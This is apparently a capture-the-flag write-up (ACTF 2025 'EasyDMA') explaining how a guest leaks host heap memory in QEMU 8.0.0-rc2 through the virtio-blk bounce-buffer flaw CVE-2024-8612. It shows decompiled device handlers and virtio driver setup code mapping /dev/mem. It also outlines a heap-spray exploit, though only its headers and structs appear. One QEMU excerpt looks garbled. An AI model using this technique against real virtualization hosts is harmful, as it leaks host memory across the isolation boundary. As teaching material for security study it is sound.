QEMU PWN - EasyDMA

EasyDMA

From: ACTF 2025

题目给出一个去符号的 qemu 二进制文件 qemu-system-x86_64,启动参数如下

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
timeout --foreground 300 ./qemu-system-x86_64 \
-L pc-bios \
-m 1024 \
-kernel bzImage \
-initrd rootfs.cpio \
-drive file=null-co://,if=none,id=mydisk \
-device virtio-blk-pci,drive=mydisk,ioeventfd=off \
-device readflag \
-append "priority=low console=ttyS0" \
-monitor /dev/null \
-nographic

添加两个设备 virtio-blk-pci, readflag

反汇编可以找到 readflag 通过 mmio 的读、写回调函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * MMIO read handler of the readflag device, as recovered by the decompiler.
 *
 * Access-size rules: offsets above 0x7F must be read with size 4; offsets up
 * to 0x7F may be read with size 4 or 8. Any other size returns -1.
 * Offset 0 returns the constant 0xDEADBEEF, offset 8 returns the qword stored
 * at opaque + 2984, and every other offset returns -1.
 */
__int64 __fastcall readflag_mmio_read(__int64 opaque, unsigned __int64 addr, int size)
{
__int64 result; // rax

// Size validation: high offsets accept only 4-byte reads.
if ( addr > 0x7F )
{
result = -1LL;
if ( size != 4 )
return result;
}
// Low offsets accept 4-byte or 8-byte reads.
else if ( size != 4 )
{
result = -1LL;
if ( size != 8 )
return result;
}
// Default answer, used when addr == 0.
result = 0xDEADBEEFLL;
if ( addr )
{
// Offset 8 reads back the value stored by the write handler at opaque + 2984.
if ( addr == 8 )
return *(_QWORD *)(opaque + 2984);
else
return -1LL;
}
return result;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
/*
 * MMIO write handler of the readflag device, as recovered by the decompiler.
 *
 * - Offset 8 (size 4 or 8): stores val at opaque + 2984.
 * - Offset 0 (size 4) with val <= 0xFFF: allocates val bytes, reads up to
 *   val - 1 bytes of the file "flag" into the allocation, NUL-terminates it
 *   and frees it again. The buffer is not cleared before free(), so the
 *   bytes that were read stay in the released heap chunk.
 * - Every other offset/size combination is ignored.
 */
void __fastcall readflag_mmio_write(__int64 opaque, unsigned __int64 addr, size_t val, int size)
{
void *v4; // rbp
FILE *v5; // rax
FILE *v6; // r12
size_t v7; // rax
int v8; // [rsp+0h] [rbp-20h]

// Size validation: high offsets accept only 4-byte writes.
if ( addr > 0x7F )
{
if ( size != 4 )
return;
}
else if ( size != 4 )
{
// The only non-4-byte write accepted is an 8-byte write to offset 8.
if ( size == 8 && addr == 8 )
goto LABEL_6;
return;
}
if ( addr )
{
if ( addr == 8 )
LABEL_6:
*(_QWORD *)(opaque + 2984) = val;
}
else if ( val <= 0xFFF )
{
// Offset 0: val is used as the allocation size.
v8 = val;
v4 = malloc(val);
if ( v4 )
{
v5 = fopen64("flag", "r");
v6 = v5;
if ( v5 )
{
// NOTE(review): for val == 0 the length (unsigned int)(v8 - 1) becomes
// 0xFFFFFFFF while the allocation is malloc(0) - confirm whether intended.
v7 = fread(v4, 1uLL, (unsigned int)(v8 - 1), v5);
if ( v7 )
*((_BYTE *)v4 + v7) = 0;
else
puts("No data read from the file.");
// Released without wiping the contents.
free(v4);
fclose(v6);
}
else
{
perror("Error opening file");
free(v4);
}
}
else
{
perror("Memory allocation failed");
}
}
}

Virtio Block Device [1]

Data types definition

For the integer data types used in the structure definitions, the following conventions are used:

  • u8, u16, u32, u64

    An unsigned integer of the specified length in bits.

  • le16, le32, le64

    An unsigned integer of the specified length in bits, in little-endian byte order.

1
2
3
4
5
6
7
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

PCI Capabilities

1
2
3
4
5
6
7
8
9
10
11
struct virtio_pci_cap {
u8 cap_vndr; /* Generic PCI field: PCI_CAP_ID_VNDR */
u8 cap_next; /* Generic PCI field: next ptr. */
u8 cap_len; /* Generic PCI field: capability length */
u8 cfg_type; /* Identifies the structure. */
u8 bar; /* Where to find it. */
u8 id; /* Multiple capabilities of the same type */
u8 padding[2/* Pad to full dword. */
le32 offset; /* Offset within bar. */
le32 length; /* Length of the structure, in bytes. */

cfg_type identifies the structure, according to the following table:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* Common configuration */
#define VIRTIO_PCI_CAP_COMMON_CFG 1
/* Notifications */
#define VIRTIO_PCI_CAP_NOTIFY_CFG 2
/* ISR Status */
#define VIRTIO_PCI_CAP_ISR_CFG 3
/* Device specific configuration */
#define VIRTIO_PCI_CAP_DEVICE_CFG 4
/* PCI configuration access */
#define VIRTIO_PCI_CAP_PCI_CFG 5
/* Shared memory region */
#define VIRTIO_PCI_CAP_SHARED_MEMORY_CFG 8
/* Vendor-specific data */
#define VIRTIO_PCI_CAP_VENDOR_CFG 9

For common configuration, its layout is below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/*
 * Layout of the virtio "common configuration" structure located through the
 * VIRTIO_PCI_CAP_COMMON_CFG capability. The per-virtqueue fields refer to
 * the queue currently chosen via queue_select.
 */
struct virtio_pci_common_cfg {
    /* About the whole device. */
    le32 device_feature_select;     /* read-write */
    le32 device_feature;            /* read-only for driver */
    le32 driver_feature_select;     /* read-write */
    le32 driver_feature;            /* read-write */
    le16 config_msix_vector;        /* read-write */
    le16 num_queues;                /* read-only for driver */
    u8 device_status;               /* read-write */
    u8 config_generation;           /* read-only for driver */
    /* About a specific virtqueue. */
    le16 queue_select;              /* read-write */
    le16 queue_size;                /* read-write */
    le16 queue_msix_vector;         /* read-write */
    le16 queue_enable;              /* read-write */
    le16 queue_notify_off;          /* read-only for driver */
    le64 queue_desc;                /* read-write */
    le64 queue_driver;              /* read-write */
    le64 queue_device;              /* read-write */
    le16 queue_notif_config_data;   /* read-only for driver */
    le16 queue_reset;               /* read-write */
    /* About the administration virtqueue. */
    le16 admin_queue_index;         /* read-only for driver */
    le16 admin_queue_num;           /* read-only for driver */
};

For notification, its layout is below:

1
2
3
4
5
/*
 * Notification capability: the generic capability header followed by the
 * multiplier that is applied to a queue's queue_notify_off.
 */
struct virtio_pci_notify_cap {
    struct virtio_pci_cap cap;
    le32 notify_off_multiplier; /* Multiplier for queue_notify_off. */
};


We recognize these capability types and record the offset of each structure.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/*
 * Print every field of one virtio PCI capability to stdout in hex, with
 * cfg_type decoded to a readable name ("unknown" for unlisted values).
 */
void print_cap(struct virtio_pci_cap* cap){
    const char* type_line;

    printf("cap_len: %x\n", cap->cap_len);

    /* Pick the line describing the structure type, then emit it once. */
    switch(cap->cfg_type){
    case VIRTIO_PCI_CAP_COMMON_CFG:
        type_line = "cfg_type: common\n";
        break;
    case VIRTIO_PCI_CAP_NOTIFY_CFG:
        type_line = "cfg_type: notify\n";
        break;
    case VIRTIO_PCI_CAP_ISR_CFG:
        type_line = "cfg_type: isr\n";
        break;
    case VIRTIO_PCI_CAP_DEVICE_CFG:
        type_line = "cfg_type: device\n";
        break;
    case VIRTIO_PCI_CAP_PCI_CFG:
        type_line = "cfg_type: pci\n";
        break;
    case VIRTIO_PCI_CAP_SHARED_MEMORY:
        type_line = "cfg_type: shared memory\n";
        break;
    case VIRTIO_PCI_CAP_VENDOR_CFG:
        type_line = "cfg_type: vendor\n";
        break;
    default:
        type_line = "cfg_type: unknown\n";
        break;
    }
    fputs(type_line, stdout);

    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}

/* Fragment: for each recognized capability type, remember where its
 * structure lives by adding the capability's offset to the mapped BAR base
 * (virtio_mmio). Other capability types are ignored. */
switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}

Virtqueue [2]

The mechanism for bulk data transport on virtio devices is pretentiously called a virtqueue. Each device can have zero or more virtqueues.

Each virtqueue can consist of up to 3 parts:

​ • Descriptor Area - used for describing buffers

​ • Driver Area - extra data supplied by driver to the device. Also called avail virtqueue.

​ • Device Area - extra data supplied by device to driver. Also called used virtqueue.

Shared memory with split ring elements

The structures of these areas are defined below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/* One entry of the Descriptor Area: a single guest buffer, optionally
 * chained to another entry through `next`. */
struct virtq_desc {
/* Address (guest-physical). */
le64 addr;
/* Length. */
le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
/* The flags as indicated above. */
le16 flags;
/* Next field if flags & NEXT */
le16 next;
};

/* Driver Area ("avail" ring): data supplied by the driver to the device. */
struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
le16 flags;
le16 idx;
/* One slot per queue entry. */
le16 ring[VIRTIO_QUEUE_SIZE];
le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

/* One entry of the used ring. */
struct virtq_used_elem {
/* Index of start of used descriptor chain. */
le32 id;

/*
* The number of bytes written into the device writable portion of
* the buffer described by the descriptor chain.
*/
le32 len;
};

/* Device Area ("used" ring): data supplied by the device to the driver. */
struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
le16 flags;
le16 idx;
/* One slot per queue entry. */
struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

The driver queues requests to the virtqueue, the type of the request is either a read (VIRTIO_BLK_T_IN), a write (VIRTIO_BLK_T_OUT), a discard (VIRTIO_BLK_T_DISCARD), a write zeroes (VIRTIO_BLK_T_WRITE_ZEROES) or a flush (VIRTIO_BLK_T_FLUSH).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
 * Layout of a block request as queued by the driver: a header (type,
 * reserved, sector), then the data in 512-byte units, then a status byte.
 * NOTE(review): this is layout notation rather than compilable C - an
 * unsized array cannot be followed by another member.
 */
struct virtio_blk_req { 
le32 type;
le32 reserved;
le64 sector;
u8 data[][512];
u8 status;
};

/* One range segment (start sector, sector count, flags).
 * NOTE(review): judging by the name, this is the payload for
 * VIRTIO_BLK_T_DISCARD / VIRTIO_BLK_T_WRITE_ZEROES - confirm against the spec. */
struct virtio_blk_discard_write_zeroes {
le64 sector;
le32 num_sectors;
struct {
le32 unmap:1;
le32 reserved:31;
} flags;
};

#define VIRTIO_BLK_T_IN 0
#define VIRTIO_BLK_T_OUT 1
#define VIRTIO_BLK_T_FLUSH 4
#define VIRTIO_BLK_T_DISCARD 11
#define VIRTIO_BLK_T_WRITE_ZEROES 13

MMIO [3]

Memory-mapped I/O (MMIO) uses the same address space to address both main memory and I/O devices. The memory and registers of the I/O devices are mapped to (associated with) address values, so a memory address may refer to either a portion of physical RAM or to memory and registers of the I/O device.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
/* Perform exactly one volatile 8-bit load from addr and return the value. */
uint8_t mmio_read8(void* addr){
    volatile uint8_t* reg = addr;
    uint8_t value = *reg;
    return value;
}

/* Perform exactly one volatile 16-bit load from addr and return the value. */
uint16_t mmio_read16(void* addr){
    volatile uint16_t* reg = addr;
    uint16_t value = *reg;
    return value;
}

/* Perform exactly one volatile 32-bit load from addr and return the value. */
uint32_t mmio_read32(void* addr){
    volatile uint32_t* reg = addr;
    uint32_t value = *reg;
    return value;
}

/* Perform exactly one volatile 64-bit load from addr and return the value. */
uint64_t mmio_read64(void* addr){
    volatile uint64_t* reg = addr;
    uint64_t value = *reg;
    return value;
}

/* Perform exactly one volatile 8-bit store of val to addr. */
void mmio_write8(void* addr, uint8_t val){
    volatile uint8_t* reg = addr;
    *reg = val;
}

/* Perform exactly one volatile 16-bit store of val to addr. */
void mmio_write16(void* addr, uint16_t val){
    volatile uint16_t* reg = addr;
    *reg = val;
}

/* Perform exactly one volatile 32-bit store of val to addr. */
void mmio_write32(void* addr, uint32_t val){
    volatile uint32_t* reg = addr;
    *reg = val;
}

/* Perform exactly one volatile 64-bit store of val to addr. */
void mmio_write64(void* addr, uint64_t val){
    volatile uint64_t* reg = addr;
    *reg = val;
}

Device configuration layout

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
 * Device-specific configuration layout of a virtio block device, located
 * through the VIRTIO_PCI_CAP_DEVICE_CFG capability.
 */
struct virtio_blk_config {
    le64 capacity;
    le32 size_max;
    le32 seg_max;
    struct virtio_blk_geometry {
        le16 cylinders;
        u8 heads;
        u8 sectors;
    } geometry;
    le32 blk_size;
    struct virtio_blk_topology {
        // # of logical blocks per physical block (log2)
        u8 physical_block_exp;
        // offset of first aligned logical block
        u8 alignment_offset;
        // suggested minimum I/O size in blocks
        le16 min_io_size;
        // optimal (suggested maximum) I/O size in blocks
        le32 opt_io_size;
    } topology;
    u8 writeback;
    u8 unused0;
    u16 num_queues;
    le32 max_discard_sectors;
    le32 max_discard_seg;
    le32 discard_sector_alignment;
    le32 max_write_zeroes_sectors;
    le32 max_write_zeroes_seg;
    u8 write_zeroes_may_unmap;
    u8 unused1[3];
    le32 max_secure_erase_sectors;
    le32 max_secure_erase_seg;
    le32 secure_erase_sector_alignment;
    struct virtio_blk_zoned_characteristics {
        le32 zone_sectors;
        le32 max_open_zones;
        le32 max_active_zones;
        le32 max_append_sectors;
        le32 write_granularity;
        u8 model;
        u8 unused2[3];
    } zoned;
};

Initialization

  1. Read capabilities
  2. Reset device
  3. Reset Virtqueue
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
void init_virtio() {
int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
if(fd < 0){
ERR("Open virtio config");
}
struct virtio_pci_cap cap;
char* config = malloc(0x1000);
int bytes_read = read(fd, config, 0x1000);
if(bytes_read < 0){
ERR("Read virtio config");
}

fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
if(fd < 0){
ERR("Open virtio resource4");
}
virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if(virtio_mmio == (volatile void*)-1){
ERR("mmap virtio mem");
}
close(fd);

u8 cap_ptr = *(u8*)(config+0x34);
while(cap_ptr != 0){
if(config[cap_ptr] != 0x9){
cap_ptr = *(u8*)(config+cap_ptr+1);
continue;
}
memcpy(&cap, config+cap_ptr, sizeof(cap));
print_cap(&cap);
switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}
cap_ptr = cap.cap_next;
}
close(fd);
free(config);

struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
mmio_write32(&common_cfg->device_feature_select, 0);
printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->device_feature_select, 1);
printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->driver_feature_select, 0);
printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
mmio_write32(&common_cfg->driver_feature_select, 1);
printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

// reset device
mmio_write8(&common_cfg->device_status, 0);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write32(&common_cfg->driver_feature_select, 0);
mmio_write32(&common_cfg->driver_feature, 0); // disable all features
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


// alloc dma memory
int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
if(dma_fd < 0){
ERR("Open dma");
}
dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
if(dma_mem == (volatile void*)-1){
ERR("mmap dma mem");
}
*(volatile uint32_t*)dma_mem = 0x12345678;
printf("%x\n", *(volatile uint32_t*)dma_mem);
*(volatile uint32_t*)dma_mem = 0;
printf("dma_mem: %p\n", dma_mem);
dma_data = dma_mem + 0x1000;
queue_desc = (struct virtq_desc*)dma_mem;
queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

// init queue
mmio_write16(&common_cfg->queue_select, 0);
mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
mmio_write16(&common_cfg->queue_enable, 1);

mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
puts("virtio init done");
}

Vulnerabilities

CVE-2024-8612

从文件的字符串中可得知 qemu 的版本号为 qemu-8.0.0-rc2,存在一个关于 virtio-blk-pci 的信息泄漏漏洞: CVE-2024-8612

具体利用还可以参考:

HEXACON2024 - DMAKiller: DMA to Escape from QEMU/KVM by Yongkang Jia, Yiming Tao & Xiao Lei,

ACTF2025-EasyDMA Writeup

当 DMA 访问的地址是 MMIO 的,会使用 bounce buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/* Map a physical memory region into a host virtual address.
* May map a subset of the requested range, given by and returned in *plen.
* May return NULL if resources needed to perform the mapping are exhausted.
* Use only for reads OR writes - not for read-modify-write operations.
* Use cpu_register_map_client() to know when retrying the map operation is
* likely to succeed.
*/
void *address_space_map(AddressSpace *as,
hwaddr addr,
hwaddr *plen,
bool is_write,
MemTxAttrs attrs)
{
hwaddr len = *plen;
hwaddr l, xlat;
MemoryRegion *mr;
FlatView *fv;

if (len == 0) {
return NULL;
}

l = len;
RCU_READ_LOCK_GUARD();
fv = address_space_to_flatview(as);
mr = flatview_translate(fv, addr, &xlat, &l, is_write, attrs);

/* Regions that cannot be accessed directly go through the single global
 * bounce buffer instead of a direct host pointer. */
if (!memory_access_is_direct(mr, is_write)) {
/* Only one bounce mapping can be outstanding at a time. */
if (qatomic_xchg(&bounce.in_use, true)) {
*plen = 0;
return NULL;
}
/* Avoid unbounded allocations */
l = MIN(l, TARGET_PAGE_SIZE);
bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l);
bounce.addr = addr;
bounce.len = l;

memory_region_ref(mr);
bounce.mr = mr;
/* The buffer is filled only on this path; when is_write is set it is
 * returned with whatever the allocation already contained. */
if (!is_write) {
flatview_read(fv, addr, MEMTXATTRS_UNSPECIFIED,
bounce.buffer, l);
}

*plen = l;
return bounce.buffer;
}
//...
}

同时,通过 qemu_memalign 得到的内存并没有初始化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/* Abridged excerpt (elided parts are marked with "//..."): validates the
 * header buffers of one virtio-blk request and dispatches on its type. */
static int virtio_blk_handle_request(VirtIOBlockReq *req, MultiReqBuffer *mrb)
{
uint32_t type;
struct iovec *in_iov = req->elem.in_sg;
struct iovec *out_iov = req->elem.out_sg;
unsigned in_num = req->elem.in_num;
unsigned out_num = req->elem.out_num;
VirtIOBlock *s = req->dev;
VirtIODevice *vdev = VIRTIO_DEVICE(s);

/* At least one out buffer and one in buffer are required. */
if (req->elem.out_num < 1 || req->elem.in_num < 1) {
virtio_error(vdev, "virtio-blk missing headers");
return -1;
}

/* Copy the request header out of the out buffers. */
if (unlikely(iov_to_buf(out_iov, out_num, 0, &req->out,
sizeof(req->out)) != sizeof(req->out))) {
virtio_error(vdev, "virtio-blk request outhdr too short");
return -1;
}

iov_discard_front_undoable(&out_iov, &out_num, sizeof(req->out),
&req->outhdr_undo);

/* The last in buffer must be able to hold the in header. */
if (in_iov[in_num - 1].iov_len < sizeof(struct virtio_blk_inhdr)) {
virtio_error(vdev, "virtio-blk request inhdr too short");
iov_discard_undo(&req->outhdr_undo);
return -1;
}

//...

/* in_len is set to the total size of the in buffers before the request
 * type is examined below. */
req->in_len = iov_size(in_iov, in_num);

//...

case VIRTIO_BLK_T_IN:
{
bool is_write = type & VIRTIO_BLK_T_OUT;
req->sector_num = virtio_ldq_p(vdev, &req->out.sector);

if (is_write) {
qemu_iovec_init_external(&req->qiov, out_iov, out_num);
trace_virtio_blk_handle_write(vdev, req, req->sector_num,
req->qiov.size / BDRV_SECTOR_SIZE);
} else {
qemu_iovec_init_external(&req->qiov, in_iov, in_num);
trace_virtio_blk_handle_read(vdev, req, req->sector_num,
req->qiov.size / BDRV_SECTOR_SIZE);
}

if (!virtio_blk_sect_range_ok(s, req->sector_num, req->qiov.size)) {
virtio_blk_req_complete(req, VIRTIO_BLK_S_IOERR);
block_acct_invalid(blk_get_stats(s->blk),
is_write ? BLOCK_ACCT_WRITE : BLOCK_ACCT_READ);
virtio_blk_free_request(req);
return 0;
}

//...

/* Unrecognized request types are completed right away with UNSUPP. */
default:
virtio_blk_req_complete(req, VIRTIO_BLK_S_UNSUPP);
virtio_blk_free_request(req);

}

在 virtio_blk_handle_request 中,即使请求不合法,长度也会被写入 req->in_len。type 不合法时,直接调用 virtio_blk_req_complete。

调用链:virtio_blk_handle_request->virtio_blk_req_complete->virtqueue_push->virtqueue_fill->virtqueue_unmap_sg->dma_memory_unmap->address_space_unmap->address_space_write

1
2
3
4
5
6
7
8
/* Last function of the call chain listed above.
 * NOTE(review): this listing looks abridged or garbled - `result` is
 * returned without ever being assigned, and `__bufread(buf, len)` may not
 * be the real body. Check against the upstream QEMU source before relying
 * on it. */
MemTxResult address_space_write(AddressSpace *as, hwaddr addr,
MemTxAttrs attrs,
const void *buf, int len)
{
MemTxResult result;
__bufread(buf, len);
return result;
}

由于缺乏保护,数据可以被写到 Common configuration 部分,并且部分空间可被读出。

Exploit

通过堆喷,将 flag 字符串填充在内存中。利用上述漏洞读出内存内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
#include<stddef.h>
#include<stdlib.h>
#include<unistd.h>
#include<fcntl.h>
#include<sys/mman.h>
#include<string.h>
#include<stdio.h>
#include<assert.h>
#include<stdint.h>
#include<sys/io.h>
#include<linux/stddef.h>

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

/* Generic header of a virtio vendor-specific PCI capability; copied out of
 * PCI config space by init_virtio(). */
struct virtio_pci_cap {
u8 cap_vndr; /* Generic PCI field: PCI_CAP_ID_VNDR */
u8 cap_next; /* Generic PCI field: next ptr. */
u8 cap_len; /* Generic PCI field: capability length */
u8 cfg_type; /* Identifies the structure. */
u8 bar; /* Where to find it. */
u8 id; /* Multiple capabilities of the same type */
u8 padding[2]; /* Pad to full dword. */
le32 offset; /* Offset within bar. */
le32 length; /* Length of the structure, in bytes. */
};

/* Register layout of the virtio common configuration structure; accessed
 * through virtio_common_mmio with the mmio_* helpers. The per-virtqueue
 * fields refer to the queue chosen via queue_select. */
struct virtio_pci_common_cfg {
/* About the whole device. */
le32 device_feature_select; /* read-write */
le32 device_feature; /* read-only for driver */
le32 driver_feature_select; /* read-write */
le32 driver_feature; /* read-write */
le16 config_msix_vector; /* read-write */
le16 num_queues; /* read-only for driver */
u8 device_status; /* read-write */
u8 config_generation; /* read-only for driver */
/* About a specific virtqueue. */
le16 queue_select; /* read-write */
le16 queue_size; /* read-write */
le16 queue_msix_vector; /* read-write */
le16 queue_enable; /* read-write */
le16 queue_notify_off; /* read-only for driver */
le64 queue_desc; /* read-write */
le64 queue_driver; /* read-write */
le64 queue_device; /* read-write */
le16 queue_notify_data; /* read-only for driver */
le16 queue_reset; /* read-write */
};

/* Notification capability: generic capability header followed by the
 * multiplier applied to a queue's queue_notify_off. */
struct virtio_notify_cfg {
struct virtio_pci_cap cap;
le32 notify_off_multiplier;
};

/* Device-specific configuration layout of the virtio block device; read
 * through virtio_device_mmio in init_virtio(). */
struct virtio_blk_config{
le64 capacity;
le32 size_max;
le32 seg_max;
struct virtio_blk_geometry {
le16 cylinders;
u8 heads;
u8 sectors;
} geometry;
le32 blk_size;
struct virtio_blk_topology {
// # of logical blocks per physical block (log2)
u8 physical_block_exp;
// offset of first aligned logical block
u8 alignment_offset;
// suggested minimum I/O size in blocks
le16 min_io_size;
// optimal (suggested maximum) I/O size in blocks
le32 opt_io_size;
} topology;
u8 writeback;
u8 unused0;
u16 num_queues;
le32 max_discard_sectors;
le32 max_discard_seg;
le32 discard_sector_alignment;
le32 max_write_zeroes_sectors;
le32 max_write_zeroes_seg;
u8 write_zeroes_may_unmap;
u8 unused1[3];
le32 max_secure_erase_sectors;
le32 max_secure_erase_seg;
le32 secure_erase_sector_alignment;
};

